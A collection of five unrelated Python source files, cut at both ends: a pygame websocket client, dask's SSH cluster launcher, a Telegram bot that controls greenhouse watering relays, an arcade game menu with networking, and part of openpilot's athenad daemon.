ws = websocket.WebSocketApp("ws://0.0.0.0:8000/", on_message=on_message, on_close=on_close)
wst = Thread(target=ws.run_forever)
wst.daemon = True
wst.start()
conn_timeout = 5
while not ws.sock.connected and conn_timeout:
time.sleep(1)
conn_timeout -= 1
def main():
global values
msg_counter = 0
""" Set up the game and run the main game loop """
pygame.init()
clock = pygame.time.Clock()
main_surface = pygame.display.set_mode(console_size_final)
main_surface.fill(pygame.Color(100, 100, 100))
buffer = pygame.Surface(pixel_size)
arrows_buffer = pygame.Surface((100, 144))
state = InitState(width, height)
font = pygame.font.Font('fonts/prstart.ttf', 8)
arrow_up = get_sprite_surface(ARROW)
arrow_up.set_colorkey(COLORS[0])
arrows = {
'up': arrow_up,
'down': pygame.transform.rotate(arrow_up, 90 * 2),
'left': pygame.transform.rotate(arrow_up, 90),
'right': pygame.transform.rotate(arrow_up, 90*3),
}
big_arrows = {k: pygame.transform.scale2x(v) for k, v in arrows.items()}
while True:
ev = pygame.event.poll()
if ev.type == pygame.QUIT:
break
selected = values["selected"]
state.update(selected)
state.draw(buffer)
state = state.get_next_state()
buffer.set_alpha(110)
main_surface.blit(pygame.transform.scale(buffer, screen_size), (40, 40))
arrows_buffer.fill(COLORS[0])
y = 4
x = 4
for i in 'up', 'down', 'left', 'right':
txt = "{0:06d}".format(values[i])
x = 4
arrows_buffer.blit(arrows[i], (x, y))
x += arrows[i].get_width() + 4
arrows_buffer.blit(font.render(txt, False, COLORS[2]), (x, y))
y += font.size(txt)[1]
y +=10
x = (arrows_buffer.get_width() - big_arrows['up'].get_width())/2
if selected == 'up':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['up'], (x, y))
y += 10 + big_arrows['up'].get_height()
x = (arrows_buffer.get_width() - big_arrows['up'].get_width()*4)/2
if selected == 'left':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['left'], (x, y))
x = (arrows_buffer.get_width() + big_arrows['up'].get_width()*2)/2
if selected == 'right':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['right'], (x, y))
y += 10 + big_arrows['up'].get_height()
x = (arrows_buffer.get_width() - big_arrows['up'].get_width())/2
if selected == 'down':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['down'], (x, y))
arrows_buffer.set_alpha(110)
main_surface.blit(pygame.transform.scale(arrows_buffer, (100 * 4, 144 * 4)), (screen_size[0] + 40 * 2, 40))
pygame.display.flip()
# ws.send('Hello world %d' % msg_counter)
msg_counter += 1
clock.tick(30)
pygame.quit() # Once we leave the loop, close the window.
main()
|
old_ssh.py
|
import logging
import os
import socket
import sys
import time
import traceback
from queue import Queue
from threading import Thread
from tlz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import PasswordRequiredException, SSHException
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger("paramiko").setLevel(logging.WARN)
ssh.connect(
hostname=cmd_dict["address"],
username=cmd_dict["ssh_username"],
port=cmd_dict["ssh_port"],
key_filename=cmd_dict["ssh_private_key"],
compress=True,
timeout=30,
banner_timeout=30,
) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException, PasswordRequiredException) as e:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection error when connecting to {addr}:{port}"
"to run '{cmd}'".format(
addr=cmd_dict["address"],
port=cmd_dict["ssh_port"],
cmd=cmd_dict["cmd"],
)
+ bcolors.ENDC
)
print(
bcolors.FAIL
+ " SSH reported this exception: "
+ str(e)
+ bcolors.ENDC
)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection failed after 3 retries. Exiting."
+ bcolors.ENDC
)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(
" "
+ bcolors.FAIL
+ f"Retrying... (attempt {retries}/3)"
+ bcolors.ENDC
)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print("[ {label} ] : {cmd}".format(label=cmd_dict["label"], cmd=cmd_dict["cmd"]))
stdin, stdout, stderr = ssh.exec_command(
"$SHELL -i -c '" + cmd_dict["cmd"] + "'", get_pty=True
)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug("stdout from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : {output}".format(
label=cmd_dict["label"], output=line
)
)
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug("stderr from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ line
+ bcolors.ENDC
)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "remote process exited with exit status "
+ str(exit_status)
+ bcolors.ENDC
)
return True
# Get transport to current SSH client
transport = ssh.get_transport()
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict["input_queue"].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
# Send noise down the pipe to keep connection active
transport.send_ignore()
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b"\x03") # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(
logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None
):
cmd = "{python} -m distributed.cli.dask_scheduler --port {port}".format(
python=remote_python or sys.executable, port=port
)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}:{port}.log".format(
addr=addr, port=port, logdir=logdir
)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = f"{bcolors.BOLD}scheduler {addr}:{port}{bcolors.ENDC}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": addr,
"port": port,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
def start_worker(
logdir,
scheduler_addr,
scheduler_port,
worker_addr,
nthreads,
nprocs,
ssh_username,
ssh_port,
ssh_private_key,
nohost,
memory_limit,
worker_port,
nanny_port,
remote_python=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
cmd = (
"{python} -m {remote_dask_worker} "
"{scheduler_addr}:{scheduler_port} "
"--nthreads {nthreads}" + (" --nprocs {nprocs}" if nprocs != 1 else "")
)
if not nohost:
cmd += " --host {worker_addr}"
if memory_limit:
cmd += " --memory-limit {memory_limit}"
if worker_port:
cmd += " --worker-port {worker_port}"
if nanny_port:
cmd += " --nanny-port {nanny_port}"
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs,
memory_limit=memory_limit,
worker_port=worker_port,
nanny_port=nanny_port,
)
if local_directory is not None:
cmd += " --local-directory {local_directory}".format(
local_directory=local_directory
)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}.log".format(
addr=worker_addr, logdir=logdir
)
label = f"worker {worker_addr}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": worker_addr,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
class SSHCluster:
def __init__(
self,
scheduler_addr,
scheduler_port,
worker_addrs,
nthreads=0,
nprocs=1,
ssh_username=None,
ssh_port=22,
ssh_private_key=None,
nohost=False,
logdir=None,
remote_python=None,
memory_limit=None,
worker_port=None,
nanny_port=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
self.memory_limit = memory_limit
self.worker_port = worker_port
self.nanny_port = nanny_port
self.remote_dask_worker = remote_dask_worker
self.local_directory = local_directory
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(
logdir,
"dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"),
)
print(
bcolors.WARNING + "Output will be redirected to logfiles "
'stored locally on individual worker nodes under "{logdir}".'.format(
logdir=logdir
)
+ bcolors.ENDC
)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(
logdir,
scheduler_addr,
scheduler_port,
ssh_username,
ssh_port,
ssh_private_key,
remote_python,
)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return "%s:%d" % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process["output_queue"].empty():
print(process["output_queue"].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(
start_worker(
self.logdir,
self.scheduler_addr,
self.scheduler_port,
address,
self.nthreads,
self.nprocs,
self.ssh_username,
self.ssh_port,
self.ssh_private_key,
self.nohost,
self.memory_limit,
self.worker_port,
self.nanny_port,
self.remote_python,
self.remote_dask_worker,
self.local_directory,
)
)
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process["input_queue"].put("shutdown")
process["thread"].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
greenhouse.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# greenhouse.py
"""
main script for greenhouse bot
using telegram.ext as Python framework for Telegram Bot API
https://core.telegram.org/api#bot-api
original: author: Stefan Weigert http://www.stefan-weigert.de/php_loader/raspi.php
adapted: Thomas Kaulke, kaulketh@gmail.com
"""
from __future__ import absolute_import
import threading
import os
import time
import utils.utils as utils
import conf
import logger
import peripherals.dht.dht as dht
import peripherals.temperature as core
import utils.stop_and_restart as stop_and_restart
import peripherals.four_digit.display as display
import peripherals.monitor as monitor
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, ParseMode, InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import Updater, CommandHandler, RegexHandler, ConversationHandler, CallbackQueryHandler
from telegram.ext.dispatcher import run_async
logger = logger.get_logger()
thread = threading.Thread(target=monitor.main, name='MainBot temperature monitoring')
thread.start()
lib = conf.lib
SELECTION, DURATION, GROUPING = range(3)
list_of_admins = conf.admins
token = conf.token
target = lib.empty
water_time = lib.empty
user_id = lib.empty
jq = None
timer_job = None
selection = ()
markup1 = ReplyKeyboardMarkup(conf.kb1, resize_keyboard=True, one_time_keyboard=True)
markup2 = ReplyKeyboardMarkup(conf.kb2, resize_keyboard=True, one_time_keyboard=True)
markup3 = ReplyKeyboardMarkup(conf.kb3, resize_keyboard=True, one_time_keyboard=True)
# Start info
def __init_bot_set_pins():
logger.info('Initializing...')
utils.set_pins()
__all_off()
display.show_standby()
return
# start bot
def __start(bot, update):
global user_id
try:
user_id = update.message.from_user.id
except (NameError, AttributeError):
try:
user_id = update.inline_query.from_user.id
except (NameError, AttributeError):
try:
user_id = update.chosen_inline_result.from_user.id
except (NameError, AttributeError):
try:
user_id = update.callback_query.from_user.id
except (NameError, AttributeError):
return ConversationHandler.END
if user_id not in list_of_admins:
display.show_stop()
logger.warning('Not allowed access by: {0} - {1},{2}'.format(
str(user_id), update.message.from_user.last_name, update.message.from_user.first_name))
__reply(update, lib.private_warning.format(update.message.from_user.first_name, update.message.chat_id))
return ConversationHandler.END
else:
display.show_run()
logger.info('Started...')
__message_values(update)
__cam_on()
display.show_ready()
__reply(
update,
'{0}{1}{2}'.format(lib.msg_welcome.format(update.message.from_user.first_name), lib.space, lib.msg_choice),
markup1)
logger.info('Bot usage: {0} - {1},{2}'.format(
str(user_id), update.message.from_user.last_name, update.message.from_user.first_name))
display.show_off()
__start_standby_timer(bot, update)
return SELECTION
# select targets
def __selection(bot, update):
global target
target = update.message.text
__stop_standby_timer(bot, update)
if target == str(lib.panic):
logger.info('Panic mode called.')
__reply(update, lib.msg_panic, ReplyKeyboardRemove())
os.system(conf.run_extended_greenhouse + str(user_id))
elif target == str(lib.live_stream):
logger.info('Live URL requested.')
__reply(update, lib.msg_live.format(str(conf.live)), markup1)
__start_standby_timer(bot, update)
return SELECTION
elif target == str(lib.reload):
logger.info('Refresh values requested.')
__message_values(update)
__start_standby_timer(bot, update)
return SELECTION
else:
return __selected_target(bot, update, target)
def __selected_target(bot, update, selected_target):
__reply(update, lib.msg_duration.format(selected_target), markup2)
logger.info('Selection: {0}'.format(str(selected_target)))
__start_standby_timer(bot, update)
return DURATION
# end: select targets
# [#31] grouping
def __grouping(bot, update, chat_data):
global selection
query = update.callback_query
btn_click = str(query.data)
if not (btn_click == str(lib.btn_finished) or btn_click == str(lib.cancel)):
if not selection.__contains__(int(btn_click)):
__stop_standby_timer(bot, update)
selection += (int(btn_click),)
bot.edit_message_text(text=lib.msg_grouping_selection.format(selection),
chat_id=query.message.chat_id,
message_id=query.message.message_id,
parse_mode=ParseMode.MARKDOWN,
reply_markup=reply_markup)
__start_standby_timer(bot, update)
elif btn_click == str(lib.btn_finished) and len(selection) > 0:
__stop_standby_timer(bot, update)
global target
target = lib.grouping
bot.edit_message_text(text=lib.msg_grouping_selection.format(selection),
chat_id=query.message.chat_id,
message_id=query.message.message_id,
parse_mode=ParseMode.MARKDOWN)
bot.send_message(text=lib.msg_duration.format(target + str(selection)),
chat_id=query.message.chat_id,
parse_mode=ParseMode.MARKDOWN,
reply_markup=markup2)
logger.info('Selected: {0} {1}'.format(str(target), str(selection)))
__start_standby_timer(bot, update)
return DURATION
elif btn_click == lib.cancel:
__stop_standby_timer(bot, update)
selection = ()
bot.delete_message(chat_id=query.message.chat_id,
message_id=query.message.message_id)
bot.send_message(text=lib.msg_new_choice,
chat_id=query.message.chat_id,
parse_mode=ParseMode.MARKDOWN,
reply_markup=markup1)
__start_standby_timer(bot, update)
return SELECTION
def __group_menu(bot, update):
global selection
selection = ()
inline_keyboard = [
[__get_btn(lib.channel_1, conf.RELAY_01), __get_btn(lib.channel_2, conf.RELAY_02),
__get_btn(lib.channel_3, conf.RELAY_03), __get_btn(lib.channel_4, conf.RELAY_04)],
[__get_btn(lib.channel_5, conf.RELAY_05), __get_btn(lib.channel_6, conf.RELAY_06),
__get_btn(lib.channel_7, conf.RELAY_07), __get_btn(lib.channel_8, conf.RELAY_08)],
[InlineKeyboardButton(lib.btn_finished, callback_data=lib.btn_finished),
InlineKeyboardButton(lib.btn_cancel, callback_data=lib.btn_cancel)]
]
global reply_markup
reply_markup = InlineKeyboardMarkup(inline_keyboard)
__reply(update, lib.msg_grouping, reply_markup)
logger.info('Grouping called.')
return GROUPING
def __get_btn(text, callback):
return InlineKeyboardButton('{0} ({1})'.format(text, callback), callback_data=callback)
# end: grouping
# water duration
def __duration(bot, update):
global water_time
global g_duration_update
g_duration_update = update
water_time = update.message.text
if water_time == str(lib.cancel):
__reply(update, lib.msg_new_choice, markup1)
logger.info(lib.msg_new_choice)
elif water_time == str(lib.panic):
__reply(update, lib.msg_panic, ReplyKeyboardRemove())
logger.info(lib.msg_panic)
os.system(conf.run_extended_greenhouse + str(user_id))
elif target == str(lib.channel_1):
display.show_switch_channel_duration(1, int(water_time))
__water(bot, update, conf.RELAY_01)
elif target == str(lib.channel_2):
display.show_switch_channel_duration(2, int(water_time))
__water(bot, update, conf.RELAY_02)
elif target == str(lib.channel_3):
display.show_switch_channel_duration(3, int(water_time))
__water(bot, update, conf.RELAY_03)
elif target == str(lib.channel_4):
display.show_switch_channel_duration(4, int(water_time))
__water(bot, update, conf.RELAY_04)
elif target == str(lib.channel_5):
display.show_switch_channel_duration(5, int(water_time))
__water(bot, update, conf.RELAY_05)
elif target == str(lib.channel_6):
display.show_switch_channel_duration(6, int(water_time))
__water(bot, update, conf.RELAY_06)
elif target == str(lib.channel_7):
display.show_switch_channel_duration(7, int(water_time))
__water(bot, update, conf.RELAY_07)
elif target == str(lib.channel_8):
display.show_switch_channel_duration(8, int(water_time))
__water(bot, update, conf.RELAY_08)
elif target == str(lib.grouping):
display.show_switch_group_duration(int(water_time))
__water_group(bot, update, selection)
else:
__reply(update, lib.msg_choice, markup1)
return SELECTION
# end: duration
# watering targets
def __all_off():
logger.info('All off.')
for relay in conf.ALL:
utils.switch_out_high(relay)
return
@run_async
def __water(bot, update, channel):
__stop_standby_timer(bot, update)
logger.info('Toggle {0} , Duration {1}'.format(str(channel), str(water_time)))
__reply(update, lib.water_on.format(target, water_time), markup3)
utils.switch_out_low(channel)
time.sleep(int(water_time) * int(lib.time_conversion))
utils.switch_out_high(channel)
__reply(update,
'{0}{1}{2}'.format(__timestamp(), lib.water_off.format(target, water_time), lib.msg_new_choice), markup1)
display.show_off()
__start_standby_timer(bot, update)
return
@run_async
def __water_group(bot, update, group):
__stop_standby_timer(bot, update)
logger.info('Toggle {0} , Duration {1}'.format(str(group), str(water_time)))
__reply(update, lib.water_on.format(target, water_time), markup3)
for channel in group:
utils.switch_out_low(channel)
time.sleep((int(water_time) * int(lib.time_conversion)))
for channel in group:
utils.switch_out_high(channel)
__reply(update,
'{0}{1}{2}'.format(__timestamp(), lib.water_off.format(target, water_time), lib.msg_new_choice), markup1)
display.show_off()
__start_standby_timer(bot, update)
return
# end watering targets
# get humidity and temperature values
def __message_values(update):
time.sleep(3)
""" avoid refresh intervals shorter than 3 seconds! """
dht.get_values()
if dht.temperature == 0:
temp = (lib.temp + lib.colon_space + '------')
else:
temp = (lib.temp + lib.colon_space + conf.temp_format).format(dht.temperature)
if dht.humidity == 0:
hum = (lib.hum + lib.colon_space + '------')
else:
hum = (lib.hum + lib.colon_space + conf.hum_format).format(dht.humidity)
core_temp = (lib.core + lib.colon_space + core.get_temperature())
__reply(update, lib.msg_temperature.format(__start_time(), temp, hum, core_temp), markup1)
return
# stop bot
def __stop(bot, update):
__all_off()
__stop_standby_timer(bot, update)
logger.info('Stopped.')
__cam_off()
display.show_stop()
__reply(update, lib.msg_stop, ReplyKeyboardRemove())
time.sleep(2)
display.show_standby()
return ConversationHandler.END
# [#39] Implement emergency stop
@run_async
def __emergency_stop_handler(bot, update, chat_data):
emergency = update.message.text
if not emergency:
return
if emergency == lib.emergency_stop:
__all_off()
__start_emergency_stop(bot, g_duration_update)
def __start_emergency_stop(bot, update):
logger.warning("Initialize emergency stop immediately.")
global emergency_job
emergency_job = jq.run_once(__job_stop_and_restart, 0, context=update)
return
# end: emergency stop
# [#30] implement standby init after given time without user activity
def __start_standby_timer(bot, update):
logger.info("Init standby timer of {0} seconds, added to queue.".format(conf.standby_timeout))
global timer_job
timer_job = jq.run_once(__job_stop_and_restart, conf.standby_timeout, context=update)
return
def __stop_standby_timer(bot, update):
timer_job.schedule_removal()
logger.info("Timer job removed from the queue.")
return
# end: standby
# job to stop and restart application
def __job_stop_and_restart(bot, job):
logger.info("Job: Stop and restart called!")
stop_and_restart.stop_and_restart(job.context)
return
# error
def __error(bot, update, e):
logger.error('Update "{0}" caused error "{1}"'.format(update, e))
try:
display.show_error()
__cam_off()
__all_off()
utils.GPIO.cleanup()
except Exception:
logger.warning('Any error occurs!')
return ConversationHandler.END
# time stamps
def __timestamp():
return utils.get_timestamp_line()
def __start_time():
return utils.get_timestamp()
# end: time stamps
# camera
def __cam_on():
logger.info('Enable camera module.')
os.system(conf.enable_camera)
return
def __cam_off():
logger.info('Disable camera module.')
os.system(conf.disable_camera)
return
# end: camera
# release info
def __message_release_info(bot, update):
__reply(update, '`' + utils.get_release_info() + '`')
return
# reply message
def __reply(update, text, markup=None):
if markup is None:
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
else:
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN, reply_markup=markup)
return
def main():
__init_bot_set_pins()
global updater
updater = Updater(token)
global jq
jq = updater.job_queue
logger.info('Init job queue.')
dp = updater.dispatcher
help_handler = CommandHandler('help', __message_release_info)
emergency_stop_handler = RegexHandler('^{0}$'.format(str(lib.emergency_stop)),
__emergency_stop_handler,
pass_chat_data=True)
ch = ConversationHandler(
entry_points=[CommandHandler('start', __start)],
states={
SELECTION: [RegexHandler('^({0}|{1}|{2}|{3}|{4}|{5}|{6}|{7}|{8}|{9}|{10})$'.format(
str(lib.channel_1), str(lib.channel_2), str(lib.channel_3), str(lib.channel_4),
str(lib.channel_5), str(lib.channel_6), str(lib.channel_7), str(lib.channel_8),
str(lib.panic), str(lib.live_stream), str(lib.reload)),
__selection),
RegexHandler('^{0}$'.format(lib.stop_bot), __stop),
RegexHandler('^{0}$'.format(lib.grouping), __group_menu)],
DURATION: [RegexHandler('^([0-9]+|{0}|{1})$'.format(str(lib.cancel), str(lib.panic)), __duration),
RegexHandler('^{0}$'.format(lib.stop_bot), __stop)],
GROUPING: [CallbackQueryHandler(__grouping, pass_chat_data=True),
RegexHandler('^({0}|{1}|{2})$'.format(
str(lib.cancel), str(lib.btn_finished), str(selection)),
__selection)]
},
fallbacks=[CommandHandler('stop', __stop)],
allow_reentry=True,
per_chat=True,
per_user=True
)
dp.add_error_handler(__error)
dp.add_handler(emergency_stop_handler)
dp.add_handler(help_handler)
dp.add_handler(ch)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
mainmenuview.py
|
import arcade
import logging
from ..gameconstants import SCREEN_WIDTH, SCREEN_HEIGHT, GAME_PATH
from multiprocessing import Process, Queue
from .gameview import GameView
from ..networking.net_interface import Pipe
import os
from textwrap import dedent
DATA_PATH = f"{GAME_PATH}/data"
def networking(forward, feedback):
while True:
pipe = Pipe(server=os.getenv("SERVER"), port=int(os.getenv("PORT")))
response = pipe.login()
feedback.put(response)
if response:
break
while True:
response = pipe.await_response()
if response[0] == "Team count":
feedback.put(response[:2])
elif response[0] == "Start":
feedback.put(["Start", response[1]])
break
while True:
items_no = forward.qsize()
for _ in range(items_no - 2):
forward.get()
data = list(forward.get())
feedback.put(pipe.transport(data))
class MainMenuView(arcade.View):
def __init__(self):
super().__init__()
self.theme = None
self.half_width = SCREEN_WIDTH / 2
self.half_height = SCREEN_HEIGHT / 2
self.background = None
self.status = "Connecting to server..."
self.connected = False
self.forward = Queue()
self.feedback = Queue()
self.start = arcade.load_sound(f"{DATA_PATH}/start.wav")
def on_show(self) -> None:
pass
def on_draw(self) -> None:
arcade.start_render()
arcade.draw_lrwh_rectangle_textured(
0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background
)
arcade.draw_text(
dedent(self.status),
550,
100,
arcade.color.WHITE,
font_size=15,
anchor_x="center",
)
def setup(self) -> None:
"""Initialize the menu."""
self.background = arcade.load_texture(f"{DATA_PATH}/b2.gif")
sync = Process(target=networking, args=(self.forward, self.feedback,))
sync.start()
def on_update(self, delta_time: float):
if not self.feedback.empty():
success = self.feedback.get()
if not self.connected:
if success:
logging.info("Connected")
self.status = "Waiting for other players... (1)"
self.connected = True
else:
logging.info("Cannot connect to server")
self.status = "Error in connection (Retrying)"
else:
if success[0] == "Team count":
self.status = f"Waiting for other players... ({success[1]})"
elif success[0] == "Start":
logging.info("Starting game")
self.status = "Launching game"
self.start.play(volume=0.5)
game_view = GameView()
self.window.show_view(game_view)
game_view.setup(self.forward, self.feedback, success[1])
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
